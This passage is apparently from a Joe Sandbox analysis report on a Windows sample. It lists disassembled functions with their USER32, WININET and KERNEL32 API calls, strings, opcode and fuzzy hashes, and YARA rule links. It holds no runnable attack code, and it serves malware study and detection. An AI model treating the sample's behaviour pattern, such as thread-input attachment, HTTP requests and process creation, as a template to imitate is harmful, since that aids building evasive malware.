Instruction Fuzzy Hash: 1E31B435A402199FDB11DFA9CC55EAEBBF4FF08300F048056FA85DB291DB75A901CB90

Function 0101B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0101B98C
GetDlgCtrlID.USER32 ref: 0101B997
GetParent.USER32 ref: 0101B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 0101B9B6
GetDlgCtrlID.USER32(?), ref: 0101B9BF
GetParent.USER32(?), ref: 0101B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 0101B9DE

Strings

ListBox, xrefs: 0101B949
ComboBox, xrefs: 0101B911

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 8ba9a3c37730ddb4f7d137ae82ac2f2036e7f48cbce30e0fa11abd92262d0337
Instruction ID: 789141e8a1e404df85c816815c975cb86ba9a70ce79ed64ca75f87c95149fdb8
Opcode Fuzzy Hash: 8ba9a3c37730ddb4f7d137ae82ac2f2036e7f48cbce30e0fa11abd92262d0337
Instruction Fuzzy Hash: 0921C174A00104BFDF04ABA5CC85EFEBBB5EB49300B00011AF5D1972A5DB7D98169B60

Function 0101B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0101BA73
GetDlgCtrlID.USER32 ref: 0101BA7E
GetParent.USER32 ref: 0101BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 0101BA9D
GetDlgCtrlID.USER32(?), ref: 0101BAA6
GetParent.USER32(?), ref: 0101BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 0101BAC5

Strings

ListBox, xrefs: 0101BA32
ComboBox, xrefs: 0101B9FA

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 3c05475b67437c4e3a717df9d7f8c3858cccc96ab162bda69441fad761fa7788
Instruction ID: 7392a5f7e5bb85dd011b6e19e3d6450a2c3691e97e922373ee5bb3f1dec63d5f
Opcode Fuzzy Hash: 3c05475b67437c4e3a717df9d7f8c3858cccc96ab162bda69441fad761fa7788
Instruction Fuzzy Hash: 2C21B375A00144BFDF00ABA5CC85EFEBBB9EF49300F400016F5D1971A5DB7D99169B60

Function 0101BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0101BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 0101BAF8
_wcscmp.LIBCMT ref: 0101BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0101BB85

Strings

details, xrefs: 0101BB33
SHELLDLL_DefView, xrefs: 0101BB04
largeicons, xrefs: 0101BB19
smallicons, xrefs: 0101BB4D
list, xrefs: 0101BB67

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: adffc0283d657c1e0805eaa9e5edac565c6e36ecac609494b993d67271543352
Instruction ID: 0a8f80c1498c4eb7d8a0e3c78d9afba9d16217b31b0d46d6416b3d7d7e619777
Opcode Fuzzy Hash: adffc0283d657c1e0805eaa9e5edac565c6e36ecac609494b993d67271543352
Instruction Fuzzy Hash: 15112776308303FAFA317525DC56DA637ACAB15264F100019F9C8E48DDEFEE98105614

Function 0103B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0103B2D5
CoInitialize.OLE32(00000000), ref: 0103B302
CoUninitialize.OLE32 ref: 0103B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 0103B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 0103B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0103B56D
CoGetObject.OLE32(?,00000000,0106D91C,?), ref: 0103B590
SetErrorMode.KERNEL32(00000000), ref: 0103B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0103B623
VariantClear.OLEAUT32(0106D91C), ref: 0103B633

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 09a2610eeeb173deda24c7baed03c4abab961bf1764dd739dfb450911f15fa28
Instruction ID: d48f791e78777dc1f79ac88e54486874d1f700631895f05cad7efcd1a0e932e8
Opcode Fuzzy Hash: 09a2610eeeb173deda24c7baed03c4abab961bf1764dd739dfb450911f15fa28
Instruction Fuzzy Hash: A9C11371608305AFD700DF69C884A6BBBE9FF88308F04495DF98A9B251DB75ED05CB52

Function 010267E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 010267FD
__swprintf.LIBCMT ref: 0102680A

Part of subcall function 0100172B: __woutput_l.LIBCMT ref: 01001784

FindResourceW.KERNEL32(?,?,0000000E), ref: 01026834
LoadResource.KERNEL32(?,00000000), ref: 01026840
LockResource.KERNEL32(00000000), ref: 0102684D
FindResourceW.KERNEL32(?,?,00000003), ref: 0102686D
LoadResource.KERNEL32(?,00000000), ref: 0102687F
SizeofResource.KERNEL32(?,00000000), ref: 0102688E
LockResource.KERNEL32(?), ref: 0102689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 010268F9

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: b142f8b3f82232f3edb778c52950501528eecd7c9dab0a58b5f539f4f695a33e
Instruction ID: 8dd8b3071d838b045ba65bf8c20f2b68e9df2a61044ae987aacfd102cc47d43b
Opcode Fuzzy Hash: b142f8b3f82232f3edb778c52950501528eecd7c9dab0a58b5f539f4f695a33e
Instruction Fuzzy Hash: B7316EB1A0026AABDB219FA1DD54EBF7BA8FF08350F008525FD86D2140E776DA11DB70

Function 01024025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 01024047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,010230A5,?,00000001), ref: 0102405B
GetWindowThreadProcessId.USER32(00000000), ref: 01024062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,010230A5,?,00000001), ref: 01024071
GetWindowThreadProcessId.USER32(?,00000000), ref: 01024083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,010230A5,?,00000001), ref: 0102409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,010230A5,?,00000001), ref: 010240AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,010230A5,?,00000001), ref: 010240F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,010230A5,?,00000001), ref: 01024108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,010230A5,?,00000001), ref: 01024113

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: f9af4c3197eadbc614eb6be61d597ccaf545808546a27748093850c30bc3f518
Instruction ID: c23b39e4fe6f206eceacf91fbb60b67e199247d873ac0a33769864a566742a8b
Opcode Fuzzy Hash: f9af4c3197eadbc614eb6be61d597ccaf545808546a27748093850c30bc3f518
Instruction Fuzzy Hash: CC319371600628BFEB31DF59DC85B6977E9FB54311F208055FAC9DA288DBBE98408B60

Function 0105DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00FFB496
SetTextColor.GDI32(?,000000FF), ref: 00FFB4A0
SetBkMode.GDI32(?,00000001), ref: 00FFB4B5
GetStockObject.GDI32(00000005), ref: 00FFB4BD
GetClientRect.USER32(?), ref: 0105DD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 0105DD7A
GetWindowDC.USER32(?), ref: 0105DD86
GetPixel.GDI32(00000000,?,?), ref: 0105DD95
ReleaseDC.USER32(?,00000000), ref: 0105DDA7
GetSysColor.USER32(00000005), ref: 0105DDC5

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: ad86382eff112be521fac112f33dd6e860aad0e32c3bc223a08cd54304a5cb53
Instruction ID: 1b214a4647e2c33dd0091105c99aadf166f53bfd85399c911c445df1cc3914a1
Opcode Fuzzy Hash: ad86382eff112be521fac112f33dd6e860aad0e32c3bc223a08cd54304a5cb53
Instruction Fuzzy Hash: 30115131600205FFDB616FE4EC08BA97BA5EF08325F104665FAE6990F5CB764941EF21

Function 0101CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0101CF50), ref: 0101CE90

Strings

CLASS, xrefs: 0101CC10
REGEXPCLASS, xrefs: 0101CC56
CLASSNN, xrefs: 0101CC33
INSTANCE, xrefs: 0101CD9E
TEXT, xrefs: 0101CDC7
NAME, xrefs: 0101CCC2

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 35ae52fc0d0c1b252180e0d33d068fe238f05d6fc25a2c8096abe80b17a9e869
Instruction ID: 8361661582f628bbf5ab6f5aacd8a526b6c3ed5cc372bbe2cd0bac4055bcdaae
Opcode Fuzzy Hash: 35ae52fc0d0c1b252180e0d33d068fe238f05d6fc25a2c8096abe80b17a9e869
Instruction Fuzzy Hash: D991E73060060AABEB48EF64C981BEEFBF4BF04300F408559E589A7195DF78E959DBD0

Function 00FE3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FE30DC
CoUninitialize.OLE32(?,00000000), ref: 00FE3181
UnregisterHotKey.USER32(?), ref: 00FE32A9
DestroyWindow.USER32(?), ref: 01055079
FreeLibrary.KERNEL32(?), ref: 010550F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 01055125

Strings

close all, xrefs: 00FE30D7

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: e9709ffb7cc2692537becc6039aabda1b02bd9dcc8370e7c8e3a52677eda4bea
Instruction ID: 823f92e85fcd7eaaab6e6267aba15b2ee4f32e1b3b4c97ca0318b9d53ee35045
Opcode Fuzzy Hash: e9709ffb7cc2692537becc6039aabda1b02bd9dcc8370e7c8e3a52677eda4bea
Instruction Fuzzy Hash: BC913930600282CFC755EF15C89DA69F7A4FF04304F5482A9E54AA7262DB38AE56EF54

Function 00FFCB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00FFCC15

Part of subcall function 00FFCCCD: GetClientRect.USER32(?,?), ref: 00FFCCF6
Part of subcall function 00FFCCCD: GetWindowRect.USER32(?,?), ref: 00FFCD37
Part of subcall function 00FFCCCD: ScreenToClient.USER32(?,?), ref: 00FFCD5F

GetDC.USER32 ref: 0105D137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0105D14A
SelectObject.GDI32(00000000,00000000), ref: 0105D158
SelectObject.GDI32(00000000,00000000), ref: 0105D16D
ReleaseDC.USER32(?,00000000), ref: 0105D175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0105D200

Strings

U, xrefs: 0105D0D5

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 03ac20e9c637338228411d5a0dde571c28fc2a8e783277baae2d06cda6d70a13
Instruction ID: efad8bbed6440b117631d95f2c0afa178fcbecd247347832708e2e32f2dd1d19
Opcode Fuzzy Hash: 03ac20e9c637338228411d5a0dde571c28fc2a8e783277baae2d06cda6d70a13
Instruction Fuzzy Hash: B271E635500209EFDF619FA8C980AFA7BB5FF48360F1442AAFED596166C7358841DF50

Function 0104ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FFB35F

Part of subcall function 00FFB63C: GetCursorPos.USER32(000000FF), ref: 00FFB64F
Part of subcall function 00FFB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00FFB66C
Part of subcall function 00FFB63C: GetAsyncKeyState.USER32(00000001), ref: 00FFB691
Part of subcall function 00FFB63C: GetAsyncKeyState.USER32(00000002), ref: 00FFB69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0104ED3C
ImageList_EndDrag.COMCTL32 ref: 0104ED42
ReleaseCapture.USER32 ref: 0104ED48
SetWindowTextW.USER32(?,00000000), ref: 0104EDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0104EE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0104EEDC

Strings

@GUI_DROPID, xrefs: 0104EE33
@GUI_DRAGFILE, xrefs: 0104EE77

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 2d978df31397ebda54a5fa69ab118ed5389e5f0fd88c66e463f72a1332ec87d8
Instruction ID: 06442a0e1fb127d59ad8cbe04ed983ebb68bd201ec13c532934ab1158470dea6
Opcode Fuzzy Hash: 2d978df31397ebda54a5fa69ab118ed5389e5f0fd88c66e463f72a1332ec87d8
Instruction Fuzzy Hash: AA51B8B0204304AFE720EF25DC96FAA37E4BF88714F44492DFAD5972A1DB799904CB52

Function 010345C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 010345FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0103462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0103466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01034682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0103468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 010346BF
InternetCloseHandle.WININET(00000000), ref: 01034706

Part of subcall function 01035052: GetLastError.KERNEL32(?,?,010343CC,00000000,00000000,00000001), ref: 01035067

Strings

, xrefs: 010346B8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 9f18d90df445bbdfd6812fef9246e4adaeeec6787cbe8d8446115414905610f2
Instruction ID: 3fd30e99fc9cce51690b13b513df75243c15a79814d541ce018a7c576f75158e
Opcode Fuzzy Hash: 9f18d90df445bbdfd6812fef9246e4adaeeec6787cbe8d8446115414905610f2
Instruction Fuzzy Hash: CE419DB1601205BFEB129F94CC88FFB7BACFF48304F004066FA81DA195E7B599449BA5

Function 0103B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0107DC00), ref: 0103B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0107DC00), ref: 0103B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0103B8C1
SysFreeString.OLEAUT32(?), ref: 0103B8EB

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 0c6d1048eff59303d91cb5e41aace6ef29e72b90089d8e3fde50943062f59458
Instruction ID: 5b50938fcfa8a512bba80f4f5351b791c4f49ac906d0139d24b5e5d65d19bb78
Opcode Fuzzy Hash: 0c6d1048eff59303d91cb5e41aace6ef29e72b90089d8e3fde50943062f59458
Instruction Fuzzy Hash: 07F16175A00109EFDF14DF94C884EAEBBB9FF89315F108499F985AB251DB31AE42CB50

Function 010424D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 010424F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 01042688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 010426AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 010426EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0104270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0104286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 010428A1
CloseHandle.KERNEL32(?), ref: 010428D0
CloseHandle.KERNEL32(?), ref: 01042947

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: a0a20dc555909b2af29994c6256968ae443a4073890c31e756615d8b40ba0d19
Instruction ID: 62a3080f23cf536bdd0929803bfcdfc0f75579d801135e523893d33fdafaf110
Opcode Fuzzy Hash: a0a20dc555909b2af29994c6256968ae443a4073890c31e756615d8b40ba0d19
Instruction Fuzzy Hash: F0D1CE75204201DFDB15EF29D890A6EBBE0BF84314F18846DF9C99B2A2DB35DC44CB92

Function 0104B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0104B3F4

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 618c70461d69c1126708c3ddb36c31c0cdb8642920b4f79b62afb2daa67abaf8
Instruction ID: d8badce94c95cbdf25a23048ccf4e49f9836f7f0a4cffa8a7d2cb3fcad8bbe20
Opcode Fuzzy Hash: 618c70461d69c1126708c3ddb36c31c0cdb8642920b4f79b62afb2daa67abaf8
Instruction Fuzzy Hash: 5051B1B0600204BBEF309E69CCC5BAD7FE4AB44755F548061FAD5D61E1CB76E9408B90

Function 00FFA699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

